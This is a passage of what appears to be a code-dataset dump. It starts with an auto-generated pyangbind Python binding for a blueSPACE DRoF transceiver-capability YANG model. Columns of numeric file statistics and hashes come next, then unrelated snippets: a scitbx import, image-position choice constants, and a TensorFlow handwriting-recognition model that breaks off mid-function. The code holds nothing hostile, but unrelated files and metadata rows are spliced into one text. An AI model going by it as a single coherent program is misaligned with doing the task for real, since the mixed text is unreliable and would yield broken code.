'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__supportable_modulation = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_modulation(self):
self.__supportable_modulation = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_supportable_subcarriers(self):
"""
Getter method for supportable_subcarriers, mapped from YANG variable /DRoF_TP_capability/supportable_subcarriers (uint32)
"""
return self.__supportable_subcarriers
def _set_supportable_subcarriers(self, v, load=False):
"""
Setter method for supportable_subcarriers, mapped from YANG variable /DRoF_TP_capability/supportable_subcarriers (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_subcarriers is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_subcarriers() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_subcarriers must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)""",
})
self.__supportable_subcarriers = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_subcarriers(self):
self.__supportable_subcarriers = YANGDynClass(unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
def _get_supportable_constellation(self):
"""
Getter method for supportable_constellation, mapped from YANG variable /DRoF_TP_capability/supportable_constellation (list)
"""
return self.__supportable_constellation
def _set_supportable_constellation(self, v, load=False):
"""
Setter method for supportable_constellation, mapped from YANG variable /DRoF_TP_capability/supportable_constellation (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_constellation is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_constellation() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_constellation must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)""",
})
self.__supportable_constellation = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_constellation(self):
self.__supportable_constellation = YANGDynClass(base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
def _get_supportable_nominal_central_frequency_range(self):
"""
Getter method for supportable_nominal_central_frequency_range, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range (container)
"""
return self.__supportable_nominal_central_frequency_range
def _set_supportable_nominal_central_frequency_range(self, v, load=False):
"""
Setter method for supportable_nominal_central_frequency_range, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_nominal_central_frequency_range is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_nominal_central_frequency_range() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_nominal_central_frequency_range must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)""",
})
self.__supportable_nominal_central_frequency_range = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_nominal_central_frequency_range(self):
self.__supportable_nominal_central_frequency_range = YANGDynClass(base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
def _get_supportable_bandwidth(self):
"""
Getter method for supportable_bandwidth, mapped from YANG variable /DRoF_TP_capability/supportable_bandwidth (string)
YANG Description: e.g. 25GHz
"""
return self.__supportable_bandwidth
def _set_supportable_bandwidth(self, v, load=False):
"""
Setter method for supportable_bandwidth, mapped from YANG variable /DRoF_TP_capability/supportable_bandwidth (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_bandwidth is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_bandwidth() directly.
YANG Description: e.g. 25GHz
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_bandwidth must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__supportable_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_bandwidth(self):
self.__supportable_bandwidth = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_supportable_FEC(self):
"""
Getter method for supportable_FEC, mapped from YANG variable /DRoF_TP_capability/supportable_FEC (list)
"""
return self.__supportable_FEC
def _set_supportable_FEC(self, v, load=False):
"""
Setter method for supportable_FEC, mapped from YANG variable /DRoF_TP_capability/supportable_FEC (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_FEC is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_FEC() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_FEC must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)""",
})
self.__supportable_FEC = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_FEC(self):
self.__supportable_FEC = YANGDynClass(base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
def _get_supportable_equalization(self):
"""
Getter method for supportable_equalization, mapped from YANG variable /DRoF_TP_capability/supportable_equalization (list)
"""
return self.__supportable_equalization
def _set_supportable_equalization(self, v, load=False):
"""
Setter method for supportable_equalization, mapped from YANG variable /DRoF_TP_capability/supportable_equalization (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_equalization is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_equalization() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_equalization must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)""",
})
self.__supportable_equalization = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_equalization(self):
self.__supportable_equalization = YANGDynClass(base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
supportable_capacity = __builtin__.property(_get_supportable_capacity)
supportable_modulation = __builtin__.property(_get_supportable_modulation)
supportable_subcarriers = __builtin__.property(_get_supportable_subcarriers)
supportable_constellation = __builtin__.property(_get_supportable_constellation)
supportable_nominal_central_frequency_range = __builtin__.property(_get_supportable_nominal_central_frequency_range)
supportable_bandwidth = __builtin__.property(_get_supportable_bandwidth)
supportable_FEC = __builtin__.property(_get_supportable_FEC)
supportable_equalization = __builtin__.property(_get_supportable_equalization)
_pyangbind_elements = OrderedDict([('supportable_capacity', supportable_capacity), ('supportable_modulation', supportable_modulation), ('supportable_subcarriers', supportable_subcarriers), ('supportable_constellation', supportable_constellation), ('supportable_nominal_central_frequency_range', supportable_nominal_central_frequency_range), ('supportable_bandwidth', supportable_bandwidth), ('supportable_FEC', supportable_FEC), ('supportable_equalization', supportable_equalization), ])
class blueSPACE_DRoF_TP_capability(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /blueSPACE-DRoF-TP-capability. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Latest update to blueSPACE-DRoF-TP-capability YANG data model.
"""
__slots__ = ('_path_helper', '_extmethods', '__DRoF_TP_capability',)
_yang_name = 'blueSPACE-DRoF-TP-capability'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__DRoF_TP_capability = YANGDynClass(base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_DRoF_TP_capability(self):
"""
Getter method for DRoF_TP_capability, mapped from YANG variable /DRoF_TP_capability (container)
"""
return self.__DRoF_TP_capability
def _set_DRoF_TP_capability(self, v, load=False):
"""
Setter method for DRoF_TP_capability, mapped from YANG variable /DRoF_TP_capability (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_DRoF_TP_capability is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_DRoF_TP_capability() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """DRoF_TP_capability must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)""",
})
self.__DRoF_TP_capability = t
if hasattr(self, '_set'):
self._set()
def _unset_DRoF_TP_capability(self):
self.__DRoF_TP_capability = YANGDynClass(base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)
DRoF_TP_capability = __builtin__.property(_get_DRoF_TP_capability, _set_DRoF_TP_capability)
_pyangbind_elements = OrderedDict([('DRoF_TP_capability', DRoF_TP_capability), ])
| 73.308557
| 2,306
| 0.752576
| 10,890
| 84,818
| 5.587971
| 0.021579
| 0.055609
| 0.148292
| 0.185693
| 0.932444
| 0.915945
| 0.906102
| 0.901829
| 0.889685
| 0.888173
| 0
| 0.005396
| 0.119538
| 84,818
| 1,156
| 2,307
| 73.371972
| 0.809465
| 0.154083
| 0
| 0.64464
| 0
| 0.030837
| 0.410276
| 0.267487
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113069
| false
| 0
| 0.022026
| 0
| 0.268722
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ad2bdd3e49c9933b56d53ff5038f652e0861a31a
| 158
|
py
|
Python
|
scitbx/linalg/eigensystem.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
scitbx/linalg/eigensystem.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
scitbx/linalg/eigensystem.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
from scitbx.linalg.ext import eigensystem_real_symmetric as real_symmetric # implicit import
| 52.666667
| 92
| 0.873418
| 21
| 158
| 6.142857
| 0.714286
| 0.20155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094937
| 158
| 2
| 93
| 79
| 0.902098
| 0.094937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
ad37eac67576e8f3a86df4a9ca2baf122f10a377
| 181
|
py
|
Python
|
glitter/blocks/text_image/choices.py
|
dhamaniasad/django-glitter
|
b9b0a3d8b49d5d9b840656f84564ba0a6e016f98
|
[
"BSD-3-Clause"
] | 3
|
2017-06-01T16:22:18.000Z
|
2018-08-22T21:45:55.000Z
|
glitter/blocks/text_image/choices.py
|
blancltd/django-glitter
|
b9b0a3d8b49d5d9b840656f84564ba0a6e016f98
|
[
"BSD-3-Clause"
] | 85
|
2016-02-25T10:34:03.000Z
|
2017-04-03T11:07:59.000Z
|
glitter/blocks/text_image/choices.py
|
dhamaniasad/django-glitter
|
b9b0a3d8b49d5d9b840656f84564ba0a6e016f98
|
[
"BSD-3-Clause"
] | 1
|
2020-04-21T19:14:11.000Z
|
2020-04-21T19:14:11.000Z
|
POSITION_IMAGE_LEFT = 'image-left'
POSITION_IMAGE_RIGHT = 'image-right'
POSITION_CHOICES = (
(POSITION_IMAGE_LEFT, 'Image Left'),
(POSITION_IMAGE_RIGHT, 'Image Right'),
)
| 20.111111
| 42
| 0.729282
| 22
| 181
| 5.590909
| 0.227273
| 0.422764
| 0.276423
| 0.357724
| 0.878049
| 0.878049
| 0.878049
| 0.878049
| 0.878049
| 0.878049
| 0
| 0
| 0.143646
| 181
| 8
| 43
| 22.625
| 0.793548
| 0
| 0
| 0
| 0
| 0
| 0.232044
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
ad6dce0fb3c75baa10b6fe8f090a39a948fb91ba
| 11,428
|
py
|
Python
|
Models/HTR_Models.py
|
terng03412/ResFlor
|
721ba62040ce35c73f5a6b4105818f8d8a3d0312
|
[
"MIT"
] | 2
|
2020-12-18T04:00:50.000Z
|
2021-11-14T14:03:33.000Z
|
Models/HTR_Models.py
|
terng03412/ResFlor
|
721ba62040ce35c73f5a6b4105818f8d8a3d0312
|
[
"MIT"
] | null | null | null |
Models/HTR_Models.py
|
terng03412/ResFlor
|
721ba62040ce35c73f5a6b4105818f8d8a3d0312
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
import cv2
import string
import h5py
keras = tf.keras
print(tf.__version__)
class FullGatedConv2D(keras.layers.Conv2D):
"""Gated Convolutional Class"""
def __init__(self, filters, **kwargs):
super(FullGatedConv2D, self).__init__(filters=filters * 2, **kwargs)
self.nb_filters = filters
def call(self, inputs):
"""Apply gated convolution"""
output = super(FullGatedConv2D, self).call(inputs)
linear = keras.layers.Activation("linear")(
output[:, :, :, :self.nb_filters])
sigmoid = keras.layers.Activation("sigmoid")(
output[:, :, :, self.nb_filters:])
return keras.layers.Multiply()([linear, sigmoid])
def compute_output_shape(self, input_shape):
"""Compute shape of layer output"""
output_shape = super(
FullGatedConv2D, self).compute_output_shape(input_shape)
return tuple(output_shape[:3]) + (self.nb_filters,)
def get_config(self):
"""Return the config of the layer"""
config = super(FullGatedConv2D, self).get_config()
config['nb_filters'] = self.nb_filters
del config['filters']
return config
def FlorHTR(input_shape, output_shape):
input_data = keras.layers.Input(name="input", shape=input_shape)
cnn = keras.layers.Conv2D(filters=16, kernel_size=(3, 3), strides=(
2, 2), padding="same", kernel_initializer="he_uniform")(input_data)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=16, kernel_size=(3, 3), padding="same")(cnn)
cnn = keras.layers.Conv2D(filters=32, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=32, kernel_size=(3, 3), padding="same")(cnn)
cnn = keras.layers.Conv2D(filters=40, kernel_size=(2, 4), strides=(
2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=40, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
cnn = keras.layers.Conv2D(filters=48, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=48, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
cnn = keras.layers.Conv2D(filters=56, kernel_size=(2, 4), strides=(
2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=56, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
cnn = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = keras.layers.MaxPooling2D(pool_size=(
1, 2), strides=(1, 2), padding="valid")(cnn)
shape = cnn.get_shape()
bgru = keras.layers.Reshape((shape[1], shape[2] * shape[3]))(cnn)
bgru = keras.layers.Bidirectional(keras.layers.GRU(
units=128, return_sequences=True, dropout=0.5))(bgru)
bgru = keras.layers.TimeDistributed(keras.layers.Dense(units=128))(bgru)
bgru = keras.layers.Bidirectional(keras.layers.GRU(
units=128, return_sequences=True, dropout=0.5))(bgru)
output_data = keras.layers.TimeDistributed(
keras.layers.Dense(units=output_shape, activation="softmax"))(bgru)
return (input_data, output_data)
def ExtendFlorHTR(input_shape, output_shape):
input_data = keras.layers.Input(name="input", shape=input_shape)
cnn = keras.layers.Conv2D(filters=16, kernel_size=(3, 3), strides=(
2, 2), padding="same", kernel_initializer="he_uniform")(input_data)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=16, kernel_size=(3, 3), padding="same")(cnn)
cnn = keras.layers.Conv2D(filters=32, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=32, kernel_size=(3, 3), padding="same")(cnn)
cnn = keras.layers.Conv2D(filters=40, kernel_size=(2, 4), strides=(
2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=40, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
cnn = keras.layers.Conv2D(filters=48, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=48, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
cnn = keras.layers.Conv2D(filters=56, kernel_size=(2, 4), strides=(
2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=56, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
cnn = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=64, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
cnn = keras.layers.MaxPooling2D(pool_size=(
1, 2), strides=(1, 2), padding="valid")(cnn)
cnn = keras.layers.Conv2D(filters=72, kernel_size=(2, 4), strides=(
2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
